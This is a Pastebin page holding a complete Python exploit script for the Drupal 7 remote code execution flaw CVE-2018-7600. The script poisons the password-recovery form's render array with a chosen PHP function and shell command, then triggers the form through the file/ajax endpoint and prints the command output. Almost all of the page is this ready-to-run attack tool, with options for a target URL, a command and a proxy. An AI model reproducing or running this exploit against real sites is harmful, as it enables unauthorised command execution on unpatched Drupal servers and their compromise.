API tools faq
paste
hexmanx

exploit

hexmanx
Jun 7th, 2018
60
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. import requests
  3. import argparse
  4. from bs4 import BeautifulSoup
  5.  
  6. def get_args():
  7. parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
  8. formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
  9. epilog= '''
  10. This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
  11. by poisoning the recover password form (user/password) and triggering it with
  12. the upload file via ajax (/file/ajax).
  13. ''')
  14. parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  15. parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  16. parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  17. parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  18. args = parser.parse_args()
  19. return args
  20.  
  21. def pwn_target(target, function, command, proxy):
  22. print(target)
  23. requests.packages.urllib3
  24. proxies = {'http': proxy, 'https': proxy}
  25. print('[*] Poisoning a form and including it in cache.')
  26. get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
  27. post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
  28. r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  29. soup = BeautifulSoup(r.text, "html.parser")
  30. try:
  31. form = soup.find('form', {'id': 'user-pass'})
  32. form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
  33. if form_build_id:
  34.  
  35. print('[*] Poisoned form ID: ' + form_build_id)
  36. print('[*] Triggering exploit to execute: ' + command)
  37. get_params = {'q':'file/ajax/name/#value/' + form_build_id}
  38. post_params = {'form_build_id':form_build_id}
  39. r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  40. parsed_result = r.text.split('[{"command":"settings"')[0]
  41. print(parsed_result)
  42. except:
  43. print("ERROR: Something went wrong.")
  44. raise
  45.  
  46. def main():
  47. print ()
  48. print ('=============================================================================')
  49. print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
  50. print ('=============================================================================\n')
  51.  
  52. args = get_args() # get the cl args
  53. pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
  54.  
  55.  
  56. if __name__ == '__main__':
  57. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!